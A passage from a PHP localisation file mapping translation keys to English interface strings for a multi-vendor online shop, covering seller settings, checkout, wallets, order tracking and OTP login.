'Refund-policy', 'cancellation-policy' => 'Cancellation-policy', 'public' => 'Public', 'go_to_vacation_mode' => 'Go to vacation mode', 'go_to_Vacation_Mode' => 'Go to Vacation Mode', 'close_now' => 'Close now', 'close_for_now' => 'Close for now', 'Shop_cover_Image' => 'Shop cover Image', 'offline_payments' => 'Offline payments', 'order_transactions' => 'Order transactions', 'Search_by_Order_ID_or_Transaction_ID' => 'Search by Order ID or Transaction ID', 'Total_Shop_Earnings' => 'Total Shop Earnings', 'Total_Product_Amount' => 'Total Product Amount', 'Product_Discount' => 'Product Discount', 'Discounted_Amount' => 'Discounted Amount', 'Delivery_Charge' => 'Delivery Charge', 'Order_Amount' => 'Order Amount', 'seller shipping' => 'Seller shipping', 'Weekly Delivery' => 'Weekly Delivery', 'Earning_From_Shipping' => 'Earning From Shipping', 'Total_Tax' => 'Total Tax', 'Seller_Wallet_Status' => 'Seller Wallet Status', 'Withdrawble_Balance' => 'Withdrawble Balance', 'Pending_Withdraws' => 'Pending Withdraws', 'Offline_Payments' => 'Offline Payments', 'Shipping_Charge' => 'Shipping Charge', 'Cash_Payment' => 'Cash Payment', 'Wallet' => 'Wallet', 'expense_Statistics' => 'Expense Statistics', 'Digital Product' => 'Digital Product', 'Digital Product on/off' => 'Digital Product on/off', 'Product_Brand' => 'Product Brand', 'Product Brand on/off' => 'Product Brand on/off', 'Order_Settings' => 'Order Settings', 'Show_Billing_Address_In_Checkout' => 'Show Billing Address In Checkout', 'refund_request_after_order_within' => 'Refund request after order within', 'cookie_setting' => 'Cookie setting', 'cookie_settings' => 'Cookie settings', 'delivery_zip_code_restriction_status_changed_successfully' => 'Delivery zip code restriction status changed successfully', 'delivery_country_restriction_status_changed_successfully' => 'Delivery country restriction status changed successfully', 'For single vendor operation deactive all seller!!' => 'For single vendor operation deactive all seller!!', 'Now your multi vendor business mode is opening you can add new seller !!' => 'Now your multi vendor business mode is opening you can add new seller !!', 'cookie_text' => 'Cookie text', 'thanks' => 'Thanks', 'i_Accept' => 'I Accept', 'Your_Privacy_Matter' => 'Your Privacy Matter', 'total_transaction' => 'Total transaction', 'Product_Statistics' => 'Product Statistics', 'Total_Expense_Amount' => 'Total Expense Amount', 'Free_Delivery_Amount' => 'Free Delivery Amount', 'Coupon_Discount_Amount' => 'Coupon Discount Amount', 'Transaction_Date' => 'Transaction Date', 'Expense_Type' => 'Expense Type', 'Expense_Amount' => 'Expense Amount', 'Total_Products' => 'Total Products', 'Soon_Stock_Out' => 'Soon Stock Out', 'Search_Method_Name' => 'Search Method Name', 'erfe' => 'Erfe', 'card_nummber' => 'Card nummber', 'master_card_number' => 'Master card number', 1000 => '1000', 'ac_number' => 'Ac number', 'status_update_failed.' => 'Status update failed.', 'payment_method_info' => 'Payment method info', 'if_thermal_printer_is_ready' => 'If thermal printer is ready', 'size' => 'Size', 'are_you_sure_change_this' => 'Are you sure change this', 'temporary_close_updated_successfully' => 'Temporary close updated successfully', 'tax_included' => 'Tax included', 'total_settled_amount' => 'Total settled amount', 'Total_Quantity_Sold' => 'Total Quantity Sold', 'open' => 'Open', 'Partner request' => 'Partner request', 'Chat_with_deliveryman' => 'Chat with deliveryman', 'Deliveryman_Review' => 'Deliveryman Review', 'pay_by_wallet' => 'Pay by wallet', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'If you require any assistance or have feedback or suggestions about our site you', 'can_email_us_at' => 'Can email us at', 'provide_a_WhatsApp_number_without_country_code' => 'Provide a WhatsApp number without country code', 'cccc' => 'Cccc', 'General_Info' => 'General Info', 'Meta_Title' => 'Meta Title', 'Meta_Description' => 'Meta Description', 'Meta_Image' => 'Meta Image', 'optional please provide embed link not direct link.' => 'Optional please provide embed link not direct link.', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'Once you have downloaded and filled the format file upload it in the form below and submit', 'You can get brand and category id from their list please input the right ids' => 'You can get brand and category id from their list please input the right ids', 'on_vacation_mode' => 'On vacation mode', 'on_vacation' => 'On vacation', 'On_Vacation' => 'On Vacation', 'this_shop_is_temporary_closed_or_on_vacation._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'This shop is temporary closed or on vacation. You cannot add product to cart from this shop for now', 'Sorry product out of stock' => 'Sorry product out of stock', 'product_Info' => 'Product Info', 'customer_Info' => 'Customer Info', 'Total_Amount' => 'Total Amount', 'Available_Color' => 'Available Color', 'Temporary_Closed' => 'Temporary Closed', 'This_shop_is_in_temporary_closed' => 'This shop is in temporary closed', 'This_shop_is_in_vacation_mode' => 'This shop is in vacation mode', 'note_from_seller' => 'Note from seller', 'this_count_is_the_summation_of' => 'This count is the summation of', 'returned_orders' => 'Returned orders', 'out_for_delivery_orders' => 'Out for delivery orders', 'this_count_is_the_summation_of_delivered_orders' => 'This count is the summation of delivered orders', 'the_ongoing_order_amount_will_be_shown_here' => 'The ongoing order amount will be shown here', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'After the order is delivered total order amount will be shown here', 'product_wise_discounted_amount_will_be_shown_here' => 'Product wise discounted amount will be shown here', 'The_product_report_will_show_based_on_the_product_added_date' => 'The product report will show based on the product added date', 'free_delivery_coupon' => 'Free delivery coupon', 'coupon_discount_will_be_shown_here' => 'Coupon discount will be shown here', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'Discount on purchase and first delivery coupon amount will be shown here', 'subscription_date' => 'Subscription date', 'cancellation policy' => 'Cancellation policy', 'return policy' => 'Return policy', 'refund policy' => 'Refund policy', 'inhouse_shop' => 'Inhouse shop', 'product_settings' => 'Product settings', 'product_add' => 'Product add', 'this_module_will_run_for_updates_after_version_13.1' => 'This module will run for updates after version 13.1', 'expense_transaction' => 'Expense transaction', 'closed_now' => 'Closed now', 'theme_setup' => 'Theme setup', 'select_your_theme' => 'Select your theme', 'no_transaction_found' => 'No transaction found', 'issuer' => 'Issuer', 'identification_number' => 'Identification number', '50% Off On Black Friday For All Stores Valid Until 31 January 2023' => '50% Off On Black Friday For All Stores Valid Until 31 January 2023', 'Offers' => 'Offers', 'flash_deals_update' => 'Flash deals update', 'Error Something went wrong' => 'Error Something went wrong', 'Flash_Deal' => 'Flash Deal', 'stores' => 'Stores', 'All_Categories' => 'All Categories', 'Find_What_You_Need' => 'Find What You Need', 'Term_&_Conditions' => 'Term & Conditions', 'Accounts' => 'Accounts', 'Quick_Links' => 'Quick Links', 'Featured_Products' => 'Featured Products', 'Hotline' => 'Hotline', 'Become a Delivery Man' => 'Become a Delivery Man', 'Open Your Store' => 'Open Your Store', 'Help & Support' => 'Help & Support', 'Top Stores' => 'Top Stores', 'New Arrivals' => 'New Arrivals', 'customer_message' => 'Customer message', 'Customer_Name' => 'Customer Name', 'Message_View' => 'Message View', 'User_details' => 'User details', 'check' => 'Check', 'Message_Log' => 'Message Log', 'Abc' => 'Abc', 'already_check' => 'Already check', 'Become_a_Delivery_Man' => 'Become a Delivery Man', 'Open_Your_Store' => 'Open Your Store', 'Help_&_Support' => 'Help & Support', 'Top_Stores' => 'Top Stores', 'New_Arrivals' => 'New Arrivals', 'Free_Shipping' => 'Free Shipping', 'Free_Shipping_on_all_Order_Above_$560' => 'Free Shipping on all Order Above $560', 'Fresh_Product' => 'Fresh Product', '100%_Secure_Payment' => '100% Secure Payment', 'We_Ensure_Secure_Transactions' => 'We Ensure Secure Transactions', '24/7_Support_Center' => '24/7 Support Center', 'Privacy Policy' => 'Privacy Policy', 'Refund Policy' => 'Refund Policy', 'Return Policy' => 'Return Policy', 'Cancellation Policy' => 'Cancellation Policy', 'Generate Sitemap' => 'Generate Sitemap', 'Generate_Sitemap' => 'Generate Sitemap', 'Download Generate Sitemap' => 'Download Generate Sitemap', 'product tag' => 'Product tag', 'withdrawal methods' => 'Withdrawal methods', 'Become_a' => 'Become a', 'Search_for_items_or_store' => 'Search for items or store', 'Discounted_Products' => 'Discounted Products', 'Select_Category' => 'Select Category', 'login_to_your_account' => 'Login to your account', 'Don’t_have_account' => 'Don’t have account', 'Ex:_6+_character' => 'Ex: 6+ character', 'Forgot_Password' => 'Forgot Password', 'or_continue_with' => 'Or continue with', 'register' => 'Register', 'First_Name' => 'First Name', 'Last_Name' => 'Last Name', 'Confirm_Password' => 'Confirm Password', 'Sign_Up' => 'Sign Up', 'enter_email_or_phone_number' => 'Enter email or phone number', 'enter_phone_number' => 'Enter phone number', 'i_agree_with_the' => 'I agree with the', 'seller added successfully' => 'Seller added successfully', 'Hurry_up' => 'Hurry up', 'offer_ends_in' => 'Offer ends in', 'Select product' => 'Select product', 'profile' => 'Profile', 'Edit_Profile' => 'Edit Profile', 'Delete_My_Account' => 'Delete My Account', 'Edit_Personal_Details' => 'Edit Personal Details', 'Go_back' => 'Go back', 'Update_Profile' => 'Update Profile', 'Wish_List' => 'Wish List', 'Compare' => 'Compare', 'Loyalty_Point' => 'Loyalty Point', 'Personal_Details' => 'Personal Details', 'My_Addresses' => 'My Addresses', 'Add_Address' => 'Add Address', 'Home_(Shipping_Address)' => 'Home (Shipping Address)', 'banner' => 'Banner', 'banner_URL' => 'Banner URL', 'addresses' => 'Addresses', 'My profile' => 'My profile', 'Compare_List' => 'Compare List', 'Inbox' => 'Inbox', 'Contact Person Name' => 'Contact Person Name', 'Ex: 01xxxxxxxxx' => 'Ex: 01xxxxxxxxx', 'Ex: 6+ character' => 'Ex: 6+ character', 'Choose_Label' => 'Choose Label', 'Contact_Person' => 'Contact Person', 'Ex:_Jhon_Doe' => 'Ex: Jhon Doe', 'Ex:_01xxxxxxxxx' => 'Ex: 01xxxxxxxxx', 'Select_Country' => 'Select Country', 'Select_City' => 'Select City', 'Zip_Code' => 'Zip Code', 'Choose_Address_Type' => 'Choose Address Type', 'Ex:_1216_Dhaka' => 'Ex: 1216 Dhaka', 'Save_This_Address' => 'Save This Address', 'Ex:01xxxxxxxxx' => 'Ex:01xxxxxxxxx', 'Data_updated_successfully!' => 'Data updated successfully!', 'reschedule' => 'Reschedule', '+88' => '+88', '+99' => '+99', '+00' => '+00', '+11' => '+11', '+22' => '+22', 'office' => 'Office', 'home' => 'Home', 'My_Order_List' => 'My Order List', 'Show_Order :' => 'Show Order :', 'Old' => 'Old', 'items' => 'Items', 'Order_Summary' => 'Order Summary', 'Delivery_Man_Info' => 'Delivery Man Info', 'Track_Order' => 'Track Order', 'Product_Details' => 'Product Details', 'Unit_Price' => 'Unit Price', 'File type: jpg jpeg png. Maximum size: 2MB' => 'File type: jpg jpeg png. Maximum size: 2MB', 'Unit_Price_:' => 'Unit Price :', 'pc' => 'Pc', 'pc_' => 'Pc ', '_pc' => ' pc', 'Comment' => 'Comment', 'Attachment' => 'Attachment', 'Upload_File' => 'Upload File', 'File_type:_jpg_jpeg_png._Maximum_size:_2MB' => 'File type: jpg jpeg png. Maximum size: 2MB', 'Submit_a_review' => 'Submit a review', 'Refund_Request' => 'Refund Request', 'Refund_reason' => 'Refund reason', 'File_type:_jpg_jpeg_png._Maximum_size' => 'File type: jpg jpeg png. Maximum size', 'Coupon_discount' => 'Coupon discount', 'Total_refundable_amount' => 'Total refundable amount', 'transaction_history' => 'Transaction history', 'order place' => 'Order place', 'loyalty point' => 'Loyalty point', 'Chat_with_Seller' => 'Chat with Seller', 'Positive_Review' => 'Positive Review', 'Standard_Delivery' => 'Standard Delivery', 'Refund_Details' => 'Refund Details', 'employee_list' => 'Employee list', 'If sales commission is disabled here the system default commission will be applied' => 'If sales commission is disabled here the system default commission will be applied', 'If GST number is disabled here it will not show in invoice' => 'If GST number is disabled here it will not show in invoice', 'want_to_delete_this_address ' => 'Want to delete this address ', 'Write_something' => 'Write something', 'Write_something ' => 'Write something ', 'send_successfully' => 'Send successfully', 'Joined' => 'Joined', 'Show_Order_:' => 'Show Order :', 'Don t Delete' => 'Don t Delete', 'My_Wish_List' => 'My Wish List', 'Clear_All' => 'Clear All', 'Update_Deliveryman' => 'Update Deliveryman', 'General_Information' => 'General Information', 'New delivery-man' => 'New delivery-man', 'Last Name' => 'Last Name', 'Ex : DH-23434-LS' => 'Ex : DH-23434-LS', 'Account_Information' => 'Account Information', 'third_party_delivery_tracking_id' => 'Third party delivery tracking id', 'Submit_a_Deliveryman_Review' => 'Submit a Deliveryman Review', 'Chat_with_delivery' => 'Chat with delivery', 'Delivered_Orders' => 'Delivered Orders', 'Leave_a_comment' => 'Leave a comment', 'Chat_with_seller' => 'Chat with seller', 'Invalid review!' => 'Invalid review!', 'Product Successfully Returned' => 'Product Successfully Returned', 'assets/img/icons/track4.png' => 'Assets/img/icons/track4.png', 'assets/img/icons/track5.png' => 'Assets/img/icons/track5.png', 'Order_placed' => 'Order placed', 'Packaging_order' => 'Packaging order', 'Order_is_on_the_way' => 'Order is on the way', 'Preparing_for_shipment' => 'Preparing for shipment', 'Order_Delivered' => 'Order Delivered', 'Product_Successfully_Returned' => 'Product Successfully Returned', 'Sorry_we_can`t_complete_your_order' => 'Sorry we can`t complete your order', 'order_canceled' => 'Order canceled', 'order_Canceled' => 'Order Canceled', 'failedSorry_we_can`t_complete_your_order' => 'FailedSorry we can`t complete your order', 'failed!Sorry_we_can`t_complete_your_order' => 'Failed!Sorry we can`t complete your order', 'failed!_Sorry_we_can`t_complete_your_order' => 'Failed! Sorry we can`t complete your order', 'failed_!_Sorry_we_can`t_complete_your_order' => 'Failed ! Sorry we can`t complete your order', 'canceled._order_Canceled' => 'Canceled. order Canceled', 'order_returned._Product_Successfully_Returned' => 'Order returned. Product Successfully Returned', 'order_status_returned._Product_Successfully_Returned' => 'Order status returned. Product Successfully Returned', 'order_failed_!_Sorry_we_can`t_complete_your_order' => 'Order failed ! Sorry we can`t complete your order', 'add_to_wishlist' => 'Add to wishlist', 'add_to_compare' => 'Add to compare', 'quick_view' => 'Quick view', 'top' => 'Top', 'Seller_Login' => 'Seller Login', 'login_to_your_seller_account' => 'Login to your seller account', 'Ex:_8+_character' => 'Ex: 8+ character', 'Enter_captcha_value' => 'Enter captcha value', 'product_edit' => 'Product edit', 'USE_COUPON' => 'USE COUPON', 'Customeer_Added_Successfully' => 'Customeer Added Successfully', '${data.message}' => '${data.message}', 'View_All' => 'View All', 'Featured_Deals' => 'Featured Deals', 'Recommended_For_You' => 'Recommended For You', 'Best_Sellings' => 'Best Sellings', 'Latest_Products' => 'Latest Products', 'sorry' => 'Sorry', 'this_item_is_currently_sold_out' => 'This item is currently sold out', 'Header Banner' => 'Header Banner', 'Top_Rated_Products' => 'Top Rated Products', 'Don’t_Miss_the_Chance' => 'Don’t Miss the Chance', 'Today’s_Best_Deal' => 'Today’s Best Deal', 'Update Deal of The Day' => 'Update Deal of The Day', 'view_cart' => 'View cart', 'go_to_checkout' => 'Go to checkout', 'Login_successful' => 'Login successful', 'Item has been removed from cart ' => 'Item has been removed from cart ', 'in_Stock' => 'In Stock', 'cart_list' => 'Cart list', 'Cart_List' => 'Cart List', 'test product' => 'Test product', 'Vat' => 'Vat', 'FREE' => 'FREE', 'DELIVERY' => 'DELIVERY', 'add_to_Cart' => 'Add to Cart', 'details_Description' => 'Details Description', 'See_More' => 'See More', 'see_More' => 'See More', 'More_from_the_Store' => 'More from the Store', 'positive_review' => 'Positive review', 'Visit_Store' => 'Visit Store', 'similar_Products_From_Other_Stores' => 'Similar Products From Other Stores', 'Shopping_Details' => 'Shopping Details', 'empty_Cart' => 'Empty Cart', 'seller product test' => 'Seller product test', 'contact_With_Seller' => 'Contact With Seller', 'Type your message' => 'Type your message', 'sgred' => 'Sgred', 'variation wise product test' => 'Variation wise product test', 'seller variation wise product' => 'Seller variation wise product', 'Item_Price' => 'Item Price', 'Promo_Code' => 'Promo Code', 'Sub_total' => 'Sub total', 'free' => 'Free', 'Continue_Shopping' => 'Continue Shopping', 'Proceed_to_Next' => 'Proceed to Next', 'write_coupon_code_here' => 'Write coupon code here', 'Shopping_And_Billing_Details' => 'Shopping And Billing Details', 'Shipping_And_Billing_Details' => 'Shipping And Billing Details', 'Shipping_Details' => 'Shipping Details', 'cart' => 'Cart', 'Delivery_Information_Details' => 'Delivery Information Details', 'Delivery_Address' => 'Delivery Address', 'Save_this_Address' => 'Save this Address', 'Set_Form_Map' => 'Set Form Map', 'Select_From_Saved' => 'Select From Saved', 'Another_Address' => 'Another Address', 'Contact_Person_Name' => 'Contact Person Name', 'search_for_items_or_store' => 'Search for items or store', 'Same_as_Delivery_Address' => 'Same as Delivery Address', 'assets/img/svg/delete.svg' => 'Assets/img/svg/delete.svg', 'Fill_all_required_fields_of_shipping/billing_address' => 'Fill all required fields of shipping/billing address', 'Payment_Information' => 'Payment Information', 'pay_with_secure_Digital_payment_gateways' => 'Pay with secure Digital payment gateways', 'Cash_on_Delivery' => 'Cash on Delivery', 'Digital_Payment' => 'Digital Payment', 'offline' => 'Offline', 'Product already added to wishlist' => 'Product already added to wishlist', 'card_holder_name' => 'Card holder name', 'card_holder_email' => 'Card holder email', 'security_code' => 'Security code', 'installments' => 'Installments', 'configuration_invalid' => 'Configuration invalid', 'Your_Order_is_Completed' => 'Your Order is Completed', 'thank_you_for_your_order' => 'Thank you for your order', 'your_order_is_being_processed_and_will_be_completed_within_3-6_hours' => 'Your order is being processed and will be completed within 3-6 hours', 'you_will_receive_an_email_confirmation_when_your_order_is_completed' => 'You will receive an email confirmation when your order is completed', 'Final_Total' => 'Final Total', 'more' => 'More', 'Sorry' => 'Sorry', 'Out_of_stock' => 'Out of stock', 'order_again' => 'Order again', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ' => 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ', 'no_similar_products_found' => 'No similar products found', 'Order_Again' => 'Order Again', 'Want_to_order_your_usuals' => 'Want to order your usuals', 'Just_reorder_from_your_previous_orders' => 'Just reorder from your previous orders', 'Find' => 'Find', 'what_you_need' => 'What you need', 'more_stores' => 'More stores', 'Buy_Now' => 'Buy Now', 'just' => 'Just', 'for_you' => 'For you', 'search...' => 'Search...', 'start_a_new_message' => 'Start a new message', 'not_found_anything' => 'Not found anything', 'want_to_clear_all_wishlist ' => 'Want to clear all wishlist ', 'My_Wallet' => 'My Wallet', 'Total_Balance' => 'Total Balance', 'How_to_use' => 'How to use', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'Earn money to your wallet by completing the offer & challenged', 'Convert_your_loyalty_points_into_wallet_money' => 'Convert your loyalty points into wallet money', 'Amin_also_reward_their_top_customers_with_wallet_money' => 'Amin also reward their top customers with wallet money', 'Send_your_wallet_money_while_order' => 'Send your wallet money while order', 'Transaction_History' => 'Transaction History', 'Debit' => 'Debit', 'Credit' => 'Credit', 'Total_Points' => 'Total Points', 'Convert_your_loyalty_point_to_wallet_money.' => 'Convert your loyalty point to wallet money.', 'Minimum_200_points_required_to_convert' => 'Minimum 200 points required to convert', 'into_currency' => 'Into currency', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'Your loyalty point will convert to currency and transfer to your wallet', 'minimum_point_for_convert_to_currency_is :' => 'Minimum point for convert to currency is :', 'create_a_support_tickets' => 'Create a support tickets', 'Close_ticket' => 'Close ticket', 'Leave_your_issue' => 'Leave your issue', 'Update_Address' => 'Update Address', 'Your_account_deleted_successfully!!' => 'Your account deleted successfully!!', 'Seller_Apply' => 'Seller Apply', 'Seller_Registration' => 'Seller Registration', 'Create_your_own_store.' => 'Create your own store.', 'Already_have_store ' => 'Already have store ', 'Open_your_and_start_selling.' => 'Open your and start selling.', 'Create_your_own_business' => 'Create your own business', 'Seller_Information' => 'Seller Information', ' Jhon' => ' Jhon', ' Doe' => ' Doe', 'Enter_email' => 'Enter email', 'Enter_phone_number' => 'Enter phone number', 'Enter_password' => 'Enter password', 'Image_Ration' => 'Image Ration', 'Image_size_must_be_within' => 'Image size must be within', 'Image_type_must_be_within' => 'Image type must be within', 'Store_Name' => 'Store Name', 'halar' => 'Halar', 'Store_Address' => 'Store Address', 'Road' => 'Road', 'Store_Banner' => 'Store Banner', 'Image_Ratio' => 'Image Ratio', 'Store_Logo' => 'Store Logo', 'I_agree_with_the' => 'I agree with the', 'Please_check_the_recaptcha' => 'Please check the recaptcha', 'color image' => 'Color image', 'various product' => 'Various product', 'Item_has_been_removed_from_cart' => 'Item has been removed from cart', 'color wise image' => 'Color wise image', 'added_to_cart_successfully!' => 'Added to cart successfully!', 'sub_category_Logo' => 'Sub category Logo', 'sub_category_list' => 'Sub category list', 'Category Logo' => 'Category Logo', 'all_items_were_not_added_to_cart_as_they_are_currently_unavailable_for_purchase!' => 'All items were not added to cart as they are currently unavailable for purchase!', 'Sidebar Banner' => 'Sidebar Banner', 'Followers' => 'Followers', 'Follow' => 'Follow', 'Quick_View' => 'Quick View', 'Search_Product' => 'Search Product', 'Search_for_items' => 'Search for items', 'Sort_by' => 'Sort by', 'High_to_Low_Price' => 'High to Low Price', 'Low_to_High_Price' => 'Low to High Price', 'A_to_Z_Order' => 'A to Z Order', 'Z_to_A_Order' => 'Z to A Order', 'Show_Product' => 'Show Product', 'Choose Option' => 'Choose Option', 'Best_Selling' => 'Best Selling', 'Top_Rated' => 'Top Rated', 'Most_Favorite' => 'Most Favorite', 'More_Categories' => 'More Categories', 'More_Brands' => 'More Brands', 'Ratings' => 'Ratings', 'Min' => 'Min', 'Max' => 'Max', 'Grid_View' => 'Grid View', 'List_View' => 'List View', 'Show_Filter_Options' => 'Show Filter Options', 'Follow_Complete' => 'Follow Complete', 'Unfollow' => 'Unfollow', 'Unfollow_Complete' => 'Unfollow Complete', 'follow' => 'Follow', 'View_style_updated' => 'View style updated', 'best selling' => 'Best selling', 'best-selling' => 'Best-selling', 'Go_To_Chatbox' => 'Go To Chatbox', 'My_Inbox' => 'My Inbox', 'No_featured_product_found' => 'No featured product found', 'No_Featured_Product_Found' => 'No Featured Product Found', 'Unfollow_now' => 'Unfollow now', 'top-rated' => 'Top-rated', 'most-favorite' => 'Most-favorite', 'shop_bottom_banner' => 'Shop bottom banner', 'Bottom' => 'Bottom', 'All_Stores' => 'All Stores', 'Store_Bottom_Banner' => 'Store Bottom Banner', 'pixel_analytics_your_pixel_id' => 'Pixel analytics your pixel id', 'pixel_analytics_your_pixel_id_from_facebook' => 'Pixel analytics your pixel id from facebook', 'google_tag_manager_id' => 'Google tag manager id', 'google_tag_manager_script_id_from_google' => 'Google tag manager script id from google', 'shop followers' => 'Shop followers', 'get_In' => 'Get In', 'touch' => 'Touch', 'call_us' => 'Call us', 'mail_us' => 'Mail us', 'Find_us' => 'Find us', 'type_here' => 'Type here', 'contact_number' => 'Contact number', 'short_title' => 'Short title', 'type_your_message_here..' => 'Type your message here..', 'flash_Deal_Products' => 'Flash Deal Products', 'Track_order' => 'Track order', 'Enter_your_order_ID_&_phone ' => 'Enter your order ID & phone ', 'to_get_delivery_updates' => 'To get delivery updates', 'My_Support_Tickets' => 'My Support Tickets', 'Want_to_unfollow_this_shop' => 'Want to unfollow this shop', 'Happy_Club' => 'Happy Club', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'Collect coupons from stores and apply to get special discount from stores', 'All_Shops' => 'All Shops', 'Don’t_Miss_Todays_Deal' => 'Don’t Miss Todays Deal', 'Let’s_Shopping_Today' => 'Let’s Shopping Today', 'Shop_Now' => 'Shop Now', 'LTR' => 'LTR', 'RTL' => 'RTL', 'light' => 'Light', 'dark' => 'Dark', 'My_Compare_List' => 'My Compare List', 'want_to_clear_all_compare_list ' => 'Want to clear all compare list ', 'Product_has_been_added_to_Compare_list' => 'Product has been added to Compare list', 'compare_list_Removed' => 'Compare list Removed', 'wishlist_Removed' => 'Wishlist Removed', 'My_Profile' => 'My Profile', 'seller test product 1' => 'Seller test product 1', 'test shipping' => 'Test shipping', 'neww seller product' => 'Neww seller product', 'similar_product_not_available' => 'Similar product not available', 'new product 2023' => 'New product 2023', 'customer_reviews' => 'Customer reviews', 'review_table' => 'Review table', 'Primary_Light_Color' => 'Primary Light Color', 'All_Brands_Page' => 'All Brands Page', 'all_brands' => 'All brands', 'show_brand :' => 'Show brand :', 'new_arrival' => 'New arrival', 'A-Z' => 'A-Z', 'Z-A' => 'Z-A', 'Sign_Out' => 'Sign Out', 'Seller_Reg' => 'Seller Reg', 'Sign_In' => 'Sign In', 'Enter_email_or_phone_number' => 'Enter email or phone number', 'Enjoy New experience' => 'Enjoy New experience', 'Captcha_Failed.' => 'Captcha Failed.', 'By_clicking_sign_up_you_are_agreed_with_our ' => 'By clicking sign up you are agreed with our ', 'Terms_&_Policy' => 'Terms & Policy', 'Have_an_Account' => 'Have an Account', 'View_All_cart_items' => 'View All cart items', 6 => '6', 'shop_secondary_banner' => 'Shop secondary banner', 'About_Company' => 'About Company', 'Days' => 'Days', 'hours' => 'Hours', 'minutes' => 'Minutes', 'seconds' => 'Seconds', 'See_All' => 'See All', 'In_Stock' => 'In Stock', 'Out_Of_Stock' => 'Out Of Stock', 'Recommended_for_You' => 'Recommended for You', 'Latest_Product' => 'Latest Product', 'Your_Most_Searching' => 'Your Most Searching', 'Top_Fashion_House' => 'Top Fashion House', 'Shop_Again_From_Your_Recent_Store' => 'Shop Again From Your Recent Store', 'Visit_Again' => 'Visit Again', 'Other s_Store' => 'Other s Store', 'Top_Rated_Seller' => 'Top Rated Seller', 'New_Seller' => 'New Seller', 'Visit_Shop' => 'Visit Shop', 'enter_email_address' => 'Enter email address', 'Live_Chat' => 'Live Chat', 'Profile_Info' => 'Profile Info', 'Wishlist' => 'Wishlist', 'In_Compare' => 'In Compare', 'My_Order' => 'My Order', 'My_Wishlist' => 'My Wishlist', 'My_Compare_list' => 'My Compare list', 'Support' => 'Support', 'Close_Ticket' => 'Close Ticket', 'Messages' => 'Messages', 'Search...' => 'Search...', 'Delivery_Man' => 'Delivery Man', 'All_Order_List' => 'All Order List', 'Remove_All' => 'Remove All', 'Unit Price' => 'Unit Price', 'Check_Status' => 'Check Status', 'My_Order_Details' => 'My Order Details', 'OnGoing' => 'OnGoing', 'Go Back' => 'Go Back', 'Zip Code' => 'Zip Code', 'Category_tag' => 'Category tag', 'Recommended' => 'Recommended', 'Positive' => 'Positive', 'Neutral' => 'Neutral', 'Negative' => 'Negative', 'View_More' => 'View More', 'View_Less' => 'View Less', 'Product_review_not_available' => 'Product review not available', 'Shop_Page' => 'Shop Page', 'Similar_Category_Product' => 'Similar Category Product', 'no_more_review_remain_to_load' => 'No more review remain to load', 'Search_Products' => 'Search Products', 'User_Not_Exist' => 'User Not Exist', 'See_Less' => 'See Less', 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product' => 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product', 'Delivery' => 'Delivery', 'most favorite' => 'Most favorite', 'product 1' => 'Product 1', 'seller test digital product 2' => 'Seller test digital product 2', 'product 2' => 'Product 2', 'Test Product' => 'Test Product', 'Proddduct 2' => 'Proddduct 2', 'All_Brand' => 'All Brand', 'Newsletter' => 'Newsletter', 'Be_the_first_one_to_know_about_discounts' => 'Be the first one to know about discounts', ' offers_and_events' => ' offers and events', 'Enter_your_email' => 'Enter your email', 'Payment_Option' => 'Payment Option', 'Price_Range' => 'Price Range', 'By_Review_Rating' => 'By Review Rating', 'Enjoy_New_experience' => 'Enjoy New experience', 'my product' => 'My product', 'Featured' => 'Featured', 'Most_Loved' => 'Most Loved', 'Password doesn t Match' => 'Password doesn t Match', 'Login_Now' => 'Login Now', 'Please_type_verify_code' => 'Please type verify code', 'Your_password_must_be_at_least_8_characters' => 'Your password must be at least 8 characters', 'Password_doesn t_Match' => 'Password doesn t Match', 'Track_Order_Result ' => 'Track Order Result ', 'Your_order' => 'Your order', 'is' => 'Is', 'Order_Created_At' => 'Order Created At', 'Olga Sheppard' => 'Olga Sheppard', 'My_Address' => 'My Address', 'My_Wishlists' => 'My Wishlists', 'My_Loyalty_Point' => 'My Loyalty Point', 'Minimum' => 'Minimum', 'points_required_to_convert' => 'Points required to convert', 'Minimum_200_Points_required_to_convert_Into_currency' => 'Minimum 200 Points required to convert Into currency', 'Close_this_ticket' => 'Close this ticket', 'start_typing' => 'Start typing', 'new shop digital product' => 'New shop digital product', 'credentials_do_not_match_or_account_has_been_suspended' => 'Credentials do not match or account has been suspended', 'Store_Secondary_Banner' => 'Store Secondary Banner', 'upload_theme' => 'Upload theme', 'select_theme' => 'Select theme', 'updated successfully!' => 'Updated successfully!', 'home_category_status' => 'Home category status', 'Top Side Banner' => 'Top Side Banner', 'Codecanyon' => 'Codecanyon', 'usename' => 'Usename', 'Ex:_Riad_Uddin' => 'Ex: Riad Uddin', 'Purchase' => 'Purchase', 'Ex: 987652' => 'Ex: 987652', 'Activate' => 'Activate', 'theme_mode' => 'Theme mode', 'Forget Password' => 'Forget Password', 'please_enter_your_email_to_send_a_verification_code_for_forget_password' => 'Please enter your email to send a verification code for forget password', 'Back_Again' => 'Back Again', 'Saved_Addresses' => 'Saved Addresses', 'Saved Addresses' => 'Saved Addresses', 'address_added_successfully!' => 'Address added successfully!', 'All_Pages_Banner' => 'All Pages Banner', 'OTP_and_login_setup' => 'OTP and login setup', 'OTP_verification' => 'OTP verification', 'order_verification' => 'Order verification', 'account_phone_not_verified' => 'Account phone not verified', 'Customer_Verify' => 'Customer Verify', 'OTP_Verification' => 'OTP Verification', 'Please_Verify_that_it’s_you' => 'Please Verify that it’s you', 'An_OTP_(One_Time_Password)_has_been_sent_to' => 'An OTP (One Time Password) has been sent to', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_phone' => 'Please enter the OTP in the field below to verify your phone', 'Resend_code_within' => 'Resend code within', 'Resend_OTP' => 'Resend OTP', 'Verification_Successfully_Completed' => 'Verification Successfully Completed', 'Thank_you_for_your_verification' => 'Thank you for your verification', 'Now_you_can_login' => 'Now 